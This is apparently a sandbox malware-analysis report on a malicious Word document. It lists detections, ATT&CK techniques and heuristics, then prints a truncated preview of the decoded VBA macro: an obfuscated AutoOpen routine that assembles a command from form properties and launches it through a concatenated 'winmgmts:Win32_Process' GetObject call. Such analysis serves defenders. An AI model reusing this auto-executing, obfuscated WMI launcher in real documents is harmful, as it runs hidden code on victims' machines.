MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
T1137.001 Office Application Startup: VBA
The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_WMI_PROCESS_CREATE' indicates that the VBA code uses WMI to launch a process, a common technique for downloading and executing further stages of malware. The presence of an 'autoopen' macro suggests it executes automatically upon opening the document.
Heuristics 7
-
ClamAV: Doc.Malware.Smpowloadbb-6965612-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Smpowloadbb-6965612-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6747 bytes |
SHA-256: 46fafa4706f53f4aeb75609e9fa505701391a177d5089ba9b7d3844d8bf04b54 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Z74186"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "w22673"
Attribute VB_Base = "0{EE749F86-F1A1-404C-BADD-4CB7021EB7F0}{0730E178-EC20-41FD-809E-CFF6CC65A68C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "q25131_"
Attribute VB_Name = "p291855"
Attribute VB_Name = "p21593"
Attribute VB_Base = "0{81CF2846-C84D-44B3-B2A7-367212CCF2A7}{7CD0F323-4443-4284-8822-81079536DA65}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "a40085"
Function Q3353823(j1_0276)
While Z70179 And G188_5
'U08466G544319z38929p74509
'Q_9088Y_358_1i_203310t9_4743_
'A43344R707273L18817_2j826102
Wend
While Q75518 And M754993
'G3982_4N3_3720f281337W35874
'j_53710X7_1359R011729S3787336
'J120709O3984_O7545_J99_909
Wend
While H127_4 And c8161878
'b7246616X002234w4568490w9_641
'q7766214w4956036Z_8834a5717466
'r4548__a4239_5v_339393j6__8989
Wend
Set Q3353823 = CVar(j1_0276)
While A55618 And i40325_
'R026_984J611_92O72057r52165
'p2617929C83_51I13_8_0w1581332
'N866474q0_2_03r572__2S_519950
Wend
While k455_33 And h39438
'i_4909j94982F33503U0192497
'u2700743t086073h556651C5_9084
'M5817__L707192b826000a2__2811
Wend
While W37120_ And P4114092
'u077596_d6460_67k4_717l6_9512
'h237_225j25434c01693R_9134
'u56893Q7_443O978925l037893
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While Y0329034 And W903_3
'N_36534Q475_796w346169i36679_4
'X_922_w632988w52_70X00_71
'a97222A00666s7_04102i23646
Wend
While u8_7814 And V37718
'v60796v694834l70266B70756
'z5970231Z6362077R15113A9618680
'J749091b5__03z186855N598944
Wend
Call V0001425
While T7888_1 And B870974
'j_42075X96432S494747i74732
'A533813f8286662Q4_88_91h3798392
'R68_8_1E05135l64__5V24138
Wend
While F6396342 And b2_5321
'm9__6978h042143n9865367M298_1
'b91071a2_02_6G1368_h130252
'k09_37l4740386z989905_l499914
Wend
End Sub
Attribute VB_Name = "i971_9_"
Function V0001425()
On Error Resume Next
While G706634 And i_348413
'U780_61c638603D06475G540_031
'V8__53V538556m02143j7777_7
'r1326351f51_41M0_26_6O_068377
Wend
While z256034 And I3850_
'D7626388Y003987_w8_86599r08850
'V_89460u61004S80725_2d2300217
'I550_3Y6_760h04798P51_809
Wend
While o984308_ And v11298_
'w550_81n14645C85_1_q370632
'f5508722R15982M37_576Z086077
'c34130a555_807R8_0562u85501
Wend
t3239169 = w22673.c85765_.PasswordChar + p21593.s51328 + w22673.c85765_.ControlTipText + p21593.T9062956 + w22673.c85765_.ControlTipText + w22673.c85765_.ControlSource + p21593.N956516 + w22673.c85765_.ControlSource + w22673.c85765_.ControlSource + p21593.I36286 + w22673.c85765_.PasswordChar + p21593.p322885 + w22673.c85765_.ControlSource
While W5296121 And O1070_
'W7013950E73024B78_05X84558
'F6053548v8050618K59571c3955597
'A8416_S1904990p6031723N574_08
Wend
While j00389 And V_296494
'p_6001A_90306L80913G9012985
'T98_9449b83452Q6991_9S03268
'P53076S55678_3C18993z03_11
Wend
Set w03423 = Q3353823(GetObject("win" + "mg" _
+ "mts:W" _
+ "in32_Pro" + "cess"))
While C357636 And w6127_
'f59652Q4270_w390864K_40165_
'A_181932n41753z61178O53097
's70781X01_085P__9_5s69__73
Wend
While b454240 And k60476
'd60048K33961_9o693591R8_628
'J09387E8507627I7412925N92139
'z2205341i96445w28_131S7570937
Wend
w03423.C
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.